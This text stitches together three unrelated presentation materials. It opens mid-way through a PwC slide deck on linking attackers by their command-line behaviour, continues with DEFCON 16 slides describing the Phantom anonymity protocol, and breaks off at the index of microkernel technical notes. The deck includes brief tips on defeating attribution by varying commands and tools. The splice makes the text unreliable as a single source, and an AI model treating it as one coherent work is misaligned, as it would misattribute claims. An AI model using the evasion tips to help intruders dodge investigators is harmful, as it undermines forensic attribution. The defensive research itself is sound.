• Navigation: most effective predictor
• Followed by exploitation, then enumeration
• Strong positive correlation to dependent variable
• Keystroke and command interval variables not reliable predictors
• Backspace: weak negative correlation to linkage
• Results statistically significant for behavioural domains
• But not for any metadata variables
PwC │ 66
ROC curves
• Results used to build ROC curves
ROC curves
I got 0.992 AUC, but it just ain't 1
Jay-Z (A ROC fella)
https://www.discogs.com/artist/21742-Jay-Z#images/30264081
ROC curve results
• Navigation = 0.992
• Enumeration = 0.912
• Exploitation = 0.964
• Keystroke interval = 0.572
• Command interval = 0.58
• Backspace variable = 0.702
• Optimal model (navigation & enumeration) = 1.0
Implications
• Observations & comparisons
• Investigation implications
• Privacy implications
• Defeating CLA
• Threats to validity
Observations & comparisons
• High levels of consistency and distinctiveness
• Navigation and enumeration combined
• No need for exploitation (in this study)
• Why was navigation specifically so prominent?
• Something everyone does, every day
• Enumeration & exploitation only done during attacks
• Navigation behaviours may be more ingrained
Observations & comparisons
• Higher accuracy than other crime types
• Behaviours less subject to influence may be more stable
• Nature of offence: offenders less likely to be influenced
• Broader approach may change
• But possibly not granular command choice
• Especially navigation
Observations & comparisons
• Metadata variables significantly weaker
• What you type has greater linking power than how you type
• Latency may have affected some of the results
• But mistakes/typos show some promise
• Needs further exploration
Implications for investigators
• Can link separate offences to common offenders
• With no atomic or computed IOCs
• But need a lot of information
• Previous CLA/attribution work: limited, specific info required
• Bennell & Canter, 2002; Hutchins et al, 2010; Clark & Landau, 2011
• Here, need as much as possible
• As granular as possible
Implications for investigators
• Need to be in a position to capture commands/keystrokes
• High-interaction honeypots
• Verbose and detailed logging
• Backdoored CTFs or vulnerable VMs
Implications for investigators
• Could also link attackers who trained together
• Or who have all done a certain certification
• Sample commands and code
• Dilutes CLA assumption of distinctiveness
• But could still assist with attribution
Privacy implications
• People can be linked to separate hosts/identities
• Based on approaches, syntax, and commands
• Regardless of anonymising measures
• Regardless of good OPSEC elsewhere
Privacy implications
• Like forensic linguistics, exploits stable behavioural traits
• Won’t be 100% accurate obviously
• And affects less of the population, compared with forensic linguistics
• e.g. ~86% of the population is literate*
• Fewer people than that can operate a command-line
* https://data.worldbank.org/indicator/SE.ADT.LITR.ZS, 27/06/18
Privacy implications
• This study only focused on commands
• May also apply to:
• Typos, and the way you correct them
• How you form capitals
• Using PgDn/PgUp
• Using arrow keys rather than the mouse
• Tabs/spaces
• Keyboard shortcuts
• Use of, and preference for, bracket types
Privacy implications
• If someone can log your keystrokes, you have issues anyway
• But this is less about identification
• If someone can log your keystrokes, it’s not hard to find out who you are
• This is more about attribution via linkage
• Could be used to link you to historical/future activity
• Used to build up repository of command profiles
Defeating CLA
• Similar to defeating authorship identification
• Make a conscious decision to disguise your style
• Forensic linguistics: solutions range from crude (Google Translate) to
sophisticated (automated changes to sentence construction, synonym
substitution, etc)
• CLA different – e.g. alias command would not work
• Hard to automate – can’t predict commands in advance
• Could semi-automate, using scripts
Note on Google Translate
• @InsightfulRobot, created by colleague Keith Short (@ItsNotKeith)
• Turns: People who succeed have momentum. The more they succeed, the
more they want to succeed, and the more they find a way to succeed.
Similarly, when someone is failing, the tendency is to get on a downward
spiral that can even become a self-fulfilling prophecy.
• into:
Note on Google Translate
• English -> Norwegian
• Norwegian -> French
• French -> Afrikaans
• Afrikaans -> Romanian
• Romanian -> Japanese
• Japanese -> English
U wot m8
Defeating CLA
• Conscious changes are probably the best way to do it
• Randomising ordering of command switches
• Switching up tools used e.g. wget instead of curl; vi instead of
nano; less instead of cat
Threats to validity
• Very small sample
• Not real-world data
• Attackers were willing volunteers
• Knew they had permission, with no risk of reprisal
• Linux only
• One scenario (low-priv shell)
• Attackers may not always want/need to escalate
Summary
• Topics for future research
• Collaboration
• Conclusion
• References
Future research
• Explore effects of expertise and temporal proximity
• Further research into metadata variables for mistakes
• Real-world data
• Stochastic analysis
• Greater environmental and scenario diversity
• Real-time or near real-time automation
Collaboration
• Get in touch if you want to discuss
• @darkartlab
• [email protected]
Conclusion
• Small, novel study
• Some promising results
• Significant implications for defenders/investigators
• As well as implications for privacy
• Needs further investigation
References
Alison, L.J., Snook, B. and Stein, K.L., 2001. Unobtrusive measurement: Using police information for forensic research. Qualitative Research, 1(2), 241-254.
Bateman, A.L. and Salfati, C.G., 2007. An examination of behavioral consistency using individual behaviors or groups of behaviors in serial homicide. Behavioral Sciences & the Law, 25(4),
527-544.
Bennell, C. and Canter, D.V., 2002. Linking commercial burglaries by modus operandi: Tests using regression and ROC analysis. Science & Justice, 42(3), 153-164.
Bennell, C. and Jones, N.J., 2005. Between a ROC and a hard place: A method for linking serial burglaries by modus operandi. Journal of Investigative Psychology and Offender Profiling,
2(1), 23-41.
Bouhana, N., Johnson, S.D. and Porter, M., 2014. Consistency and specificity in burglars who commit prolific residential burglary: Testing the core assumptions underpinning behavioural
crime linkage. Legal and Criminological Psychology, 21(1), 77-94.
Caliskan-Islam, A., Yamaguchi, F., Dauber, E., Harang, R., Rieck, K., Greenstadt, R. and Narayanan, A., 2015. When Coding Style Survives Compilation: Deanonymizing Programmers from
Executable Binaries. arXiv preprint arXiv:1512.08546.
Canter, D., 1995. Psychology of offender profiling. Handbook of psychology in legal contexts (1994).
Canter, D., 2000. Offender profiling and criminal differentiation. Legal and Criminological Psychology, 5(1), 23-46.
Chiesa, R., Ducci, S. and Ciappi, S., 2008. Profiling hackers: the science of criminal profiling as applied to the world of hacking (Vol. 49). CRC Press.
Clark, D.D. and Landau, S., 2011. Untangling attribution. Harv. Nat'l Sec. J., 2
Craik, M. and Patrick, A., 1994. Linking serial offences. Policing London 10
data.worldbank.org/indicator/SE.ADT.LITR.ZS, accessed 27/06/2018
References
Donald, I. and Canter, D., 1992. Intentionality and fatality during the King's Cross underground fire. European journal of social psychology, 22(3), 203-218.
Douglas, J.E. and Munn, C., 1992. Violent crime scene analysis: Modus operandi, signature and staging. FBI Law Enforcement Bulletin, 61(2).
Filippoupolitis, A., Loukas, G. and Kapetanakis, S., 2014. Towards real-time profiling of human attackers and bot detection.
http://gala.gre.ac.uk/14947/1/14947_Loukas_Towards%20real%20time%20profiling%20(AAM)%202014..pdf, accessed 05/07/2018.
Freyd, Jennifer J., 1996. Betrayal Trauma: The Logic of Forgetting Childhood Abuse. Cambridge: Harvard University Press.
Furr, R.M. and Funder, D.C., 2004. Situational similarity and behavioral consistency: Subjective, objective, variable-centered, and person-centered approaches. Journal of Research in
Personality, 38(5), 421-447.
github.com/NetSPI/skl, accessed 27/06/2018
Grubin, D., Kelly, P. and Brunsdon, C., 2001. Linking serious sexual assaults through behaviour (Vol. 215). Home Office, Research, Development and Statistics Directorate.
Guitton, C., 2012. Criminals and cyber attacks: The missing link between attribution and deterrence. International Journal of Cyber Criminology, 6
Halligan, S. L., Michael, T., Clark, D. M., & Ehlers, A. (2003). Posttraumatic stress disorder following assault: The role of cognitive processing, trauma memory, and appraisals. Journal of
consulting and clinical psychology, 71(3)
Harbort, S. and Mokros, A., 2001. Serial Murderers in Germany from 1945 to 1995: A Descriptive Study. Homicide Studies, 5(4), 311-334.
Hettema, J. and Hol, D.P., 1998. Primary control and the consistency of interpersonal behaviour across different situations. European journal of personality, 12(4), 231-247.
Hunker, J., Hutchinson, B. and Margulies, J., 2008. Role and challenges for sufficient cyber-attack attribution. Institute for Information Infrastructure Protection 5-10.
Hutchins, E.M., Cloppert, M.J. and Amin, R.M., 2011. Intelligence-driven computer network defense informed by analysis of adversary campaigns and intrusion kill chains. Leading Issues
in Information Warfare & Security Research, 1
Landreth, B., 1985. Out of the inner circle: A hacker guide to computer security. Microsoft Press.
References
Mejia, E.F., 2014. Act and actor attribution in cyberspace: a proposed analytic framework. Air Univ Maxwell AFB AL Strategic Studies Quarterly.
Mischel, W. and Shoda, Y., 1995. A cognitive-affective system theory of personality: reconceptualizing situations, dispositions, dynamics, and invariance in personality structure.
Psychological review, 102(2)
Mischel, W., 1999. Personality coherence and dispositions in a cognitive-affective personality system (CAPS) approach. In: The coherence of personality: Social-cognitive bases of
consistency, variability, and organization (eds. Cervone and Shoda), 37-60.
Mokros, A. and Alison, L.J., 2002. Is offender profiling possible? Testing the predicted homology of crime scene actions and background characteristics in a sample of rapists. Legal and
Criminological Psychology, 7(1), 25-43.
Moran, N. and Bennett, J., 2013. Supply Chain Analysis: From Quartermaster to Sun-shop (Vol. 11). FireEye Labs.
Pervin, L.A., 2002. Current controversies and issues in personality. 3rd ed. John Wiley & Sons.
Ramsbrock, D., Berthier, R. and Cukier, M., 2007, June. Profiling attacker behavior following SSH compromises. In 37th Annual IEEE/IFIP international conference on dependable systems
and networks (DSN'07) 119-124
Raynal, F., Berthier, Y., Biondi, P. and Kaminsky, D., 2004. Honeypot forensics, Part II: analyzing the compromised host. IEEE security & privacy, 2(5), 77-80.
Rid, T. and Buchanan, B., 2015. Attributing cyber attacks. Journal of Strategic Studies, 38(1-2), 4-37
Salles-Loustau, G., Berthier, R., Collange, E., Sobesto, B. and Cukier, M., 2011, December. Characterizing attackers and attacks: An empirical study. In Dependable Computing (PRDC), 2011
IEEE 17th Pacific Rim International Symposium on Dependable Computing 174-183
Shaw, E., Ruby, K. and Post, J., 1998. The insider threat to information systems: The psychology of the dangerous insider. Security Awareness Bulletin, 2(98), 1-10.
Shoda, Y., Mischel, W. and Wright, J.C., 1994. Intraindividual stability in the organization and patterning of behavior: incorporating psychological situations into the idiographic analysis of
personality. Journal of personality and social psychology, 67(4)
References
Slater, C., Woodhams, J. and Hamilton-Giachritsis, C., 2015. Testing the Assumptions of Crime Linkage with Stranger Sex Offenses: A More Ecologically-Valid Study. Journal of
Police and Criminal Psychology, 30(4), 261-273.
Sorochinski, M. and Salfati, C.G., 2010. The consistency of inconsistency in serial homicide: Patterns of behavioural change across series. Journal of Investigative Psychology and
Offender Profiling, 7(2), 109-136.
Swets, J.A., 1988. Measuring the accuracy of diagnostic systems. Science, 240(4857), 1285-1293.
Symantec, 2011. W32.Duqu: The precursor to the next Stuxnet. Symantec Corporation, California, USA. Available from
https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf
Tonkin, M., Grant, T. and Bond, J.W., 2008. To link or not to link: A test of the case linkage principles using serial car theft data. Journal of Investigative Psychology and Offender
Profiling, 5(1‐2), 59-77.
Watters, P.A., McCombie, S., Layton, R. and Pieprzyk, J., 2012. Characterising and predicting cyber attacks using the Cyber Attacker Model Profile (CAMP). Journal of
Money Laundering Control, 15(4), 430-441.
Wheeler, D.A. and Larsen, G.N., 2003. Techniques for cyber attack attribution (No. IDA-P-3792). Institute for Defense Analyses, Alexandria, VA, USA.
Woodhams, J. and Grant, T., 2006. Developing a categorization system for rapists’ speech. Psychology, Crime & Law, 12(3), 245-260.
Woodhams, J. and Labuschagne, G., 2012. A test of case linkage principles with solved and unsolved serial rapes. Journal of Police and Criminal Psychology, 27(1), 85-98.
Zayas, V., Shoda, Y. and Ayduk, O.N., 2002. Personality in context: An interpersonal systems perspective. Journal of personality, 70(6), 851-900.
At PwC, our purpose is to build trust in society and solve important problems. We’re a network of firms in 157 countries with more than 223,000 people who are committed to delivering quality in assurance, advisory and tax services. Find out more and tell
us what matters to you by visiting us at www.pwc.com.
This publication has been prepared for general guidance on matters of interest only, and does not constitute professional advice. You should not act upon the information contained in this publication without obtaining specific professional advice. No
representation or warranty (express or implied) is given as to the accuracy or completeness of the information contained in this publication, and, to the extent permitted by law, PricewaterhouseCoopers LLP, its members, employees and agents do not
accept or assume any liability, responsibility or duty of care for any consequences of you or anyone else acting, or refraining to act, in reliance on the information contained in this publication or for any decision based on it.
© 2018 PricewaterhouseCoopers LLP. All rights reserved. In this document, "PwC" refers to the UK member firm, and may sometimes refer to the PwC network. Each member firm is a separate legal entity. Please see www.pwc.com/structure for further
details.
Thoughts, questions, feedback:
@darkartlab
[email protected]
Generic, Decentralized, Unstoppable Anonymity:
The Phantom Protocol
DEFCON 16 Presentation
Magnus Bråding 2008
Short Author Presentation
Magnus Bråding
• Swedish security researcher (Fortego Security)
• 10+ years in the security business
• Central contributor and driving force behind
woodmann.com reverse engineering community
Project Background
(why is this interesting?)
Big upswing in anti-online-privacy measures during the last couple of years
• Huge pressure from media companies
• ISPs tracking and throttling arbitrary traffic
• Data retention laws
• Draconian laws for tracking and punishing P2P users
• Abuse and misuse of global network blacklists, under the cover of being ”child porn” related, while in reality being much more arbitrary censorship
• Recent EU law proposal to register, track and regulate all bloggers!
• Dictatorships and other regimes with oppressed people censoring and tracking Internet use on an increasingly larger scale
A huge upcoming demand for anonymity seems unavoidable!
Existing anonymization solutions are in many ways not well suited for
this upcoming demand and the circumstances surrounding it
There is no real “standard” for anonymization, like BitTorrent is for P2P
A perfect opportunity to get it right with a new solution, from the start!
Goals of the Project
To be a good reference for future work within the
field of anonymization
To inspire further discussion about the optimal
requirements for the future anonymization demand
To be a starting point and inspiration for the
design and development of a global de facto
standard for generic anonymization
Not to be a complete detailed specification ready
to be implemented, but rather to be built upon
Limitations
The protocol is designed to work in any network
environment as long as no single attacker is able
to eavesdrop all participating nodes in a
correlated fashion, or directly controls a large
majority of all nodes in the network
• Such an attacker will still never be able to see what
participating nodes are talking about though, only who
they are communicating with
• The protocol also contains built-in countermeasures to
protect against attackers that are only able to monitor
parts of the network
Further Assumptions and Directives
Arbitrary random peers in the network are
assumed to be compromised and/or adverse
CPU power, network bandwidth, working memory
and secondary storage resources are all relatively
cheap, and will all be available in ever increasing
quantity during coming years and thereafter
• Thus, wherever a choice must be made between better
security or better performance / lower resource
consumption, the most secure alternative should be
chosen (within reasonable bounds, of course)
Design Goals
Design Goal Overview
Very important with well thought-out design
goals, this is at least half the work in any
successful project!
The design goals are stipulated with the
requirements and demand of today and the
future in mind
Design Goal Overview
Eight primary design goals:
1. Complete decentralization
2. Maximum DoS resistance
3. Theoretically secure anonymization
4. Theoretically secure end-to-end encryption
5. Complete isolation from the ”normal” Internet
6. Protection against protocol identification
7. High Traffic Volume and Throughput Capability
8. Generic, Well-Abstracted and Backward Compatible
Design Goal #1:
Complete Decentralization
No central or weak points can exist
They will be targeted
• Legally
• Technically (DoS attacks, takedowns etc)
Both ownership and technical design must
be decentralized
• Open/community owned design & source code
Design Goal #2:
Maximum DoS Resistance
The only way to stop a decentralized
system without any legal owners is to DoS it
It only takes one weakness, so defensive
thinking must be applied throughout all
levels of the design
Design Goal #3:
Theoretically Secure Anonymization
Nothing should be left to chance
No security by obscurity
All anonymization aspects should be able
to be expressed as a risk probability or a
theoretical (cryptographic) proof
Design Goal #4:
Theoretically Secure End-to-End Encryption
Confidentiality is not only important by
itself, but also directly important to
anonymity!
• Eavesdropped communication is highly likely to
contain information of more or less identifying
nature at some point!
Even if someone would monitor and
correlate all traffic at all points in the entire
network, they should not be able to see
what is communicated, no matter what
Design Goal #5:
Isolation from the "Normal" Internet
Users should not have to worry about Internet
crimes being perpetrated from their own IP
address
An isolated network is necessary to be able to
enforce end-to-end encryption for generic traffic
Using an isolated network has many advantages,
but not so many disadvantages in the end
Out-proxies to the ”normal” Internet can still be
implemented on the application level, selectively
Design Goal #6:
Protection against Protocol Identification
Many powerful interests will lobby against
a protocol like this, both to lawmakers and
ISPs (who are already today filtering traffic)
The harder it is made to positively identify
the usage of the protocol, the harder it will
be to track, filter and throttle it
Design Goal #7:
High Volume / Throughput Capacity
The traffic volume for ”normal usage” of the
Internet increases every day
More or less high speed / throughput is
necessary for many Internet applications
Popularity will be proportionally related to
transfer speed and volume
Anonymity is directly related to popularity
Design Goal #8:
Generic, Well-Abstracted and Backward Compatible
A generic system is practically always superior to a specific system in the long run
A well-abstracted system allows for efficient, distributed design and implementation
A system compatible with all pre-existing network enabled applications will get a much quicker takeoff and community penetration, and will have a much larger potential
A Bird’s-Eye View
The Basic Idea
[Diagram: two nodes, α and β. With direct IP communication each learns the other's address (”IP address of α = 5.6.7.8”, ”IP address of β = 1.2.3.4”); over the anonymous network, neither node can determine the other's IP address.]
More About the Idea
Each anonymized node prepares its own
”routing path”, which is a series of nodes
ready to route connections and data for it
If two anonymized nodes want to communicate,
it is done by creating an interconnection
between their individual routing paths
Routing Paths
Each anonymized node decide the size and
composition of their own routing paths, affecting
both the strength of anonymity provided by
them, and their maximum throughput capacity
High Level Design
Routing Path - Generalization
[Diagram: the anonymized node α, an intermediate node, arbitrarily many more intermediate nodes, and a terminating intermediate node.]
Routing Tunnels
[Diagram: the same routing path structure, from the anonymized node α to the terminating intermediate node.]
Whenever the anonymized node wants to
establish a connection to another node, a ”routing
tunnel” is set up inside the already existing
routing path
Such a routing tunnel is set up relatively quickly, and will then be connected to another routing tunnel inside another routing path, to form a complete anonymized connection
AP Addresses
”Anonymous Protocol” addresses
Equivalent to IP addresses in their format
Equivalent to IP addresses in functionality,
with the exception that they allow
communication between two peers without
automatically revealing their identity
Backward compatible with IP applications
The Network Database
Equivalent to the routing tables of the ”normal”
Internet
Distributed and decentralized database based on
DHT (Distributed Hash Table) technology
• Proven technology
• Automatic resilience to constantly disappearing and
newly joining nodes
• Automatic resilience to malicious nodes of some kinds
The network nodes are the database
Design Details
Secure Routing Path Establishment
[Diagram: the anonymized node α and a pool of candidate X-nodes and Y-nodes.]
First, the nodes that will constitute the routing path are selected by the anonymized node
A set of temporary ”helper nodes” are then also selected
All the selected nodes are then ordered into a sequence
The selection of the order of nodes in the sequence must
obey the following rules:
• No two X-nodes can be adjacent to each other
• A Y-node should be located in one end of the sequence
• A number of Y-nodes equal to the total number of X-nodes minus one, should be located adjacent to each other in the other end of the sequence
• One end of the sequence should be chosen at random to be the beginning of the sequence
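These ordering rules can be sketched as a small generator. The node names, the random source, and the assumption of 2x−1 Y-nodes for x X-nodes (as in the deck's example of X3, X5, X7 with Y1–Y8) are illustrative, not part of the specification.

```python
import random

def build_sequence(x_nodes, y_nodes):
    """Order routing-path nodes (X) and helper nodes (Y) so that:
    no two X-nodes are adjacent, one lone Y-node sits at one end, and
    len(x_nodes) - 1 Y-nodes sit adjacent at the other end.
    Assumes len(y_nodes) == 2 * len(x_nodes) - 1, as in the deck's example."""
    ys = list(y_nodes)
    seq = [ys.pop() for _ in range(len(x_nodes) - 1)]  # Y-block at one end
    for x in x_nodes:                                   # interleave X, Y, X, Y, ...
        seq.append(x)
        seq.append(ys.pop())                            # sequence ends with a lone Y
    if random.random() < 0.5:                           # pick the beginning at random
        seq.reverse()
    return seq

seq = build_sequence(["X3", "X5", "X7"], ["Y1", "Y2", "Y4", "Y6", "Y8"])
```

Any output of this generator satisfies all four rules regardless of which end is chosen as the beginning.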
[Diagram: the ordered sequence Y1, Y2, X3, Y4, X5, Y6, X7, Y8.]
A ”goodie box” is prepared for
each node, by the anonymized node
[Diagram: the same node sequence again, this time highlighting the X-nodes X3, X5 and X7.]
Another round is started, with a new
goodie box for each participating node
The routing path is now
securely established!
The Goodie Box
• The routing path construction certificate
• IP address and port number of next/previous nodes
• Random IDs of next/previous node connections
• Communication certificate of next/previous nodes
• Seeds and params for dummy package creation
• Seeds and params for stream encryption keys
• Flags
• A secure hash of the entire (encrypted) setup package array in currently expected state
• A secure cryptographic hash of the (decrypted) contents of the current setup package

Second round extras:
• A signed routing table entry, for the AP address associated with the routing path
Secure Routing Tunnel Establishment
(outbound)
The anonymized node wants to establish a
connection to a certain AP address
It begins by sending a notification
package through the routing path
A new set of connections are created for the
tunnel, and a reply package is sent through these
The reply package enables the anonymized node to derive
the keys of all the intermediary nodes, while it is
impossible for any of them to derive any key with it
themselves
The anonymized node informs the exit node
of the desired AP address to connect to
The exit node performs the connection, and confirms a
successful connection back to the anonymized node
The connection is fully established at both ends, and
the application layer can now start communicating over
it!
Secure Routing Tunnel Establishment
(inbound)
An incoming connection request arrives to
the entry node of the routing path
The entry node sends an initialization
package to the anonymized node
The initialization package enables the anonymized node to
immediately derive the keys of all the intermediary nodes, while it
is impossible for any of them to derive any key with it themselves
A new set of connections are created for the
tunnel, and a reply package is sent through these
The entry node confirms the
connection to the external peer
It then confirms a successful connection
back to the anonymized node
The connection is now fully established at both ends,
and the application layer can start communicating over it!
To achieve symmetry with outbound connections
though, a dummy package is first sent over the tunnel
This symmetry is important!
Secure End-to-End Encryption
Once a full anonymized end-to-end
connection has been established between
two peers, double authenticated SSL can
be used over it, as a final layer of
encryption / authentication
The used certificates can be stored in the
network database, in the individual entries
for each AP address
IP Backward Compatibility
Identical format and functionality of IP
• Address format
• Port semantics
• Connection semantics
Binary hooks for all common network APIs
• No need for any application author assistance
• No need for any application source code
• The application won’t even know that it’s anonymized
The common Internet DNS system can be used
Simple to start supporting IPv6 and similar too
The Network Database
Contains separate tables
• Node IP address table, with associated info
• Node AP address table, with associated info
The database can be accessed through a specific strict API
Voting algorithms, digital signatures and enforced entry
expiry dates are used on top of the standard DHT
technology in some cases, to help enforce permissions
and protect from malicious manipulation of database
contents and query results
Resilient to ”net splits”
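The extra integrity layer on top of the DHT can be sketched as an expiry check plus a majority vote over replica answers. The entry fields are assumptions for illustration, and the HMAC here merely stands in for the real public-key digital signatures the design calls for.

```python
import hashlib
import hmac
import time
from collections import Counter

SECRET = b"demo-signing-key"  # stand-in for a real signing key pair

def sign(entry):
    """Sign the fields of a database entry (HMAC as a signature stand-in)."""
    msg = f"{entry['ap']}|{entry['value']}|{entry['expires']}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()

def valid(entry, now):
    """Reject expired entries and entries whose signature does not verify."""
    return entry["expires"] > now and hmac.compare_digest(sign(entry), entry["sig"])

def resolve(replica_answers, now):
    """Majority vote over the values returned by several DHT replicas,
    counting only entries that pass the expiry/signature checks."""
    votes = Counter(e["value"] for e in replica_answers if valid(e, now))
    return votes.most_common(1)[0][0] if votes else None

now = time.time()
good = {"ap": "10.1.2.3", "value": "cert-A", "expires": now + 3600}
good["sig"] = sign(good)
stale = {"ap": "10.1.2.3", "value": "cert-B", "expires": now - 1}
stale["sig"] = sign(stale)
forged = {"ap": "10.1.2.3", "value": "cert-C", "expires": now + 3600, "sig": "0" * 64}
```

Here a malicious replica returning a forged or stale entry is simply outvoted (or filtered out) before the query result is accepted.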
Manual Override Command Support
Powerful emergency measure
• Protection against DoS attacks
• Restoration after possible more or less successful DoS attacks
• Protection against known malicious nodes
Signed commands can be flooded to all clients
• Many DHT implementations natively support this feature
• Commands signed by trusted party, e.g. project maintainers etc
• Verification certificate hard coded into the client application
Only commands for banning IP addresses, manually edit
the network database etc, never affecting client computers!
No real worry if signing keys would leak or be cracked
• A minor update of the client could immediately be released, with a
new key (verification certificate) hard coded into it, problem solved
High-Availability Routing Paths
[Diagram: a high-availability routing path where each position in the path is backed by several parallel nodes, X1a–X1g, X2a–X2g and X3a–X3g.]
Aftermath
Legal Aspects & Implications
File sharing example:
1.
Today: Lawsuits based on people connecting to a
certain torrent
2.
Lawsuits based on people using a certain file sharing
program / protocol
3.
Lawsuits against endpoints in anonymization networks
4.
Lawsuits against routers on the Internet?
5.
Lawsuits based on people using a generic
anonymization protocol
6.
Lawsuits based on people using cryptography?
7.
Lawsuits based on people using the Internet?
Legal Aspects & Implications
License trickery?
• A license for the main specification, saying that a certain EULA must accompany all implementations of the protocol
• The EULA in turn, would say that through using the protocol implementation in question, the user:
– Understands and agrees that no node in the anonymous network can be held responsible for any of the data that is being routed through it, due to the simple fact that the user neither has any control over what such data may contain, nor any possibility whatsoever to access the data itself
– Agrees not to use the protocol implementation to gather data that can or will be used in the process of filing a lawsuit against any of the network users that are just routing data
• Probably won’t work in many ways and several countries, but still an interesting line of thought to be investigated further
Review of Design Goals
Review of our eight original design goals:
1. Complete decentralization
2. Maximum DoS resistance
3. Theoretically secure anonymization
4. Theoretically secure end-to-end encryption
5. Complete isolation from the ”normal” Internet
6. Protection against protocol identification
7. High Traffic Volume and Throughput Capability
8. Generic, Well-Abstracted and Backward Compatible
Review of Design Goal #1:
Complete Decentralization
The protocol design has no central points,
or even nodes that are individually more
valuable to the collected function of the
anonymous network than any other
Thus there are no single points of the
network to attack, neither technically nor
legally, in order to bring down any other
parts of the network than those exact ones
attacked
Review of Design Goal #2:
Maximum DoS Resistance
DoS resistance has been a concern during
the entire design process, and has limited
possible attack vectors substantially
Can always be improved though
Must continue to be a constant area of
concern and improvement for future
development
Review of Design Goal #3:
Theoretically Secure Anonymization
All involved risk probabilities can be
expressed in terms of other known
probabilities
All security is based on cryptography and
randomness, never on obscurity or chance
Hopefully no gaping holes have been left to
chance, but review and improvements are
of course needed, as always in security
Review of Design Goal #4:
Theoretically Secure End-to-End Encryption
All data is encrypted in multiple layers with
well-known and trusted algorithms,
protecting it from all other nodes except the
communicating peers
All connections are wrapped by SSL, so
the protection from external eavesdroppers
should under all circumstances be at least
equivalent to that of SSL
Review of Design Goal #5:
Isolation from the "Normal" Internet
It is impossible to contact and communicate with
any regular IP address on the Internet from inside
the anonymous network
The network can therefore not be used to
anonymously commit illegal acts against any
computer that has not itself joined and exposed
services to the anonymous network, and thus
accepted the risks involved in anonymous
communication for these
Review of Design Goal #6:
Protection against Protocol Identification
SSL connections are used as an external shell for all
connections used by the protocol, and by default they also
use the standard web server SSL port (tcp/443)
Thus, neither the port number nor any of the contents of
the communication can be directly used to distinguish it
from common secure web traffic
There are of course practically always enough advanced
traffic analysis methods to identify certain kinds of traffic,
or at least distinguish traffic from a certain other kind of
traffic, but if this is made hard enough, it will take up too
many resources or produce too many false positives to be
practically or commercially viable
Review of Design Goal #7:
High Volume / Throughput Capacity
There is no practical way for a node to know if it is
communicating directly with a certain node, or
rather with the terminating intermediate node of
one of the routing paths owned by this node
Intermediate nodes will never know if they are
adjacent to the anonymized node in a path or not
Thus, single point-to-point connections between
two nodes on the anonymous network, without
any intermediate nodes at all (or with very few
such), can be used while still preserving a great
measure of anonymity, and/or ”reasonable doubt”
Review of Design Goal #8:
Generic, Well-Abstracted and Backward Compatible
The protocol supports arbitrary network
communication, i.e. generic anonymization
The protocol design is abstracted in a way that
each individual level of the protocol can be
exchanged or redesigned without the other parts
being affected or having to be redesigned at the
same time
The protocol emulates / hooks all TCP network
APIs, and can thus be externally applied to any
application that uses common TCP communication
Comparison with Other Anonymization
Solutions
Advantages of Phantom over TOR
• Designed from the ground up with current and future
practical anonymization needs and demand in mind
• Compatible with all existing and future network enabled
software, without any need for adaptations or upgrades
• Higher throughput
• No traffic volume limits
• Isolated from the ”normal” Internet
• End-to-end encryption
• Better prevents positive protocol identification
• Not vulnerable to ”DNS leak” attacks and similar
Comparison with Other Anonymization
Solutions
Advantages of Phantom over I2P
• Compatible with all existing and future network enabled
software, without any need for adaptations or upgrades
• Higher throughput
• End-to-end encryption
• Better prevents positive traffic analysis identification
Comparison with Other Anonymization
Solutions
Advantages of Phantom over anonymized P2P
• Less likely to be the target of a “general ban”
• The generic nature of Phantom opens up far more potential
than binding the anonymization to a single application or
usage area
Known Weaknesses
1. If all the nodes in a routing path are being controlled by the
same attacker, this attacker can bind the anonymized node to the
entry/exit node
– Still, no data can be eavesdropped; only which AP addresses it
communicates with can be concluded
– One very important detail is that it will be very hard for the
attacker to conclusively know that its nodes actually constitute
the entire path, since the last attacker-controlled node will never
be able to determine if it is actually communicating with the
anonymized node itself, or with just yet another intermediate node
in the routing path
– The algorithms for routing path node selection can be optimized
to minimize the risk of such a successful attack
Known Weaknesses
2. If an attacker monitors the traffic of all nodes in the network,
it will be able to conclude the same thing as in the previous
weakness, without even having to doubt where the routing paths end
– This has been stated as a limitation from the start though
– Some anonymization protocols try to counter such attacks by
delaying data and sending out junk data, but this goes against the
high throughput design goal of Phantom
Known Weaknesses
3. Individual intermediate nodes in a routing path could try to
communicate their identity to other non-adjacent attacker-controlled
intermediate nodes in the same routing path, by means of different
kinds of covert channels
– Examples of such covert channels could be information encoding
using timing or chunk size for communicated data
– Could be countered to some degree by micro delays and data chunk
size reorganization in intermediate nodes, but very hard to defend
against completely
– Again though, it is very hard for the attacker to conclusively
know where in the path its nodes are located, since they will never
be able to determine if they are communicating with another
intermediate node or not, or even the direction of the path
Summary
There is no complete specification of the Phantom protocol
ready for immediate implementation
The main goals of this project are rather to:
• Explore the optimal requirements for an anonymization solution of
today and future years
• Provide examples of solutions for problems likely to be associated
with these requirements
• Inspire discussions about the design of such a system
• Be the starting point of an open de facto standard for free, secure
and ubiquitous Internet anonymization
Please see the Phantom white paper for more details:
• http://www.fortego.se/phantom.pdf
Future of Phantom
A Google Code repository, wiki and
discussion group have been reserved for the
project, which will hopefully serve
as a central coordinating location for future
design, development and implementation of
the Phantom protocol and the ideas
inspired by it:
http://code.google.com/p/phantom
Questions / Discussion
If you come up with a question later on, feel free to ask me over a
beer, or to contact me by email!
[email protected]
Microkernel development:
from project to implementation
Technical Notes
Rodrigo Maximiano Antunes de Almeida
[email protected]
Universidade Federal de Itajubá
Summary
These are the technical notes for the ESC talk “Microkernel development: from project to
implementation”, given by Rodrigo Maximiano Antunes de Almeida, from Unifei.
The talk consists of the design and implementation of a microkernel. The project is developed in
ISO C without the standard libraries, so that the code presented to the participants can easily be
ported to any architecture and used as a basis for future projects. The standardization of
procedures and hardware requests, encapsulated as drivers, is also addressed. Upon completion, the
participants will have a better understanding of the kernel, its advantages and restrictions.
This document presents some of the topics covered in the talk in deeper detail, mainly
the theoretical ones.
License
This document is licensed under Creative Commons – Attribution – Non Commercial – Share Alike license. You're free to:
to Share — to copy, distribute and transmit the work
to Remix — to adapt the work
Under the following conditions:
Attribution — You must attribute the work (but not in any way that suggests that they endorse you or your use of the
work).
Noncommercial — You may not use this work for commercial purposes.
Share Alike — If you alter, transform, or build upon this work, you may distribute the resulting work only under the
same or similar license to this one.
Index
1 Developing an embedded system ..... 1
1.1 System connections ..... 1
2 System programming ..... 3
2.1 Making access to the hardware ..... 3
2.2 Accessing individual bits ..... 3
